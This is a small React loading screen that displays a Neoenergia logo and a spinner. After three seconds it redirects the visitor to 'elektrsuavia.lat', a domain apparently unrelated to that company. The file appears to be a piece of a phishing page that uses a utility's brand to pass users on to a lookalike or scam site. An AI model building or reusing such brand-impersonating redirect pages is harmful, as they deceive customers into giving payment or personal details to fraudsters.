
import { useEffect } from 'react';

export default function Loading() {
  useEffect(() => {
    const timer = setTimeout(() => {
      window.location.href = 'https://elektrsuavia.lat';
    }, 3000);

    return () => clearTimeout(timer);
  }, []);

  return (
    <div className="flex flex-col items-center justify-center min-h-screen bg-white">
      <div className="flex flex-col items-center gap-8">
        <img 
          src="https://static.readdy.ai/image/bbfcf3c80fb45280233f421c8e77190f/0d1b401094e54db2b17a7896d56e40dc.png"
          alt="Neoenergia"
          className="w-80 h-auto object-contain"
        />
        
        <div className="relative w-16 h-16">
          <div className="absolute inset-0 border-4 border-gray-200 rounded-full"></div>
          <div className="absolute inset-0 border-4 border-green-600 rounded-full border-t-transparent animate-spin"></div>
        </div>
      </div>
    </div>
  );
}
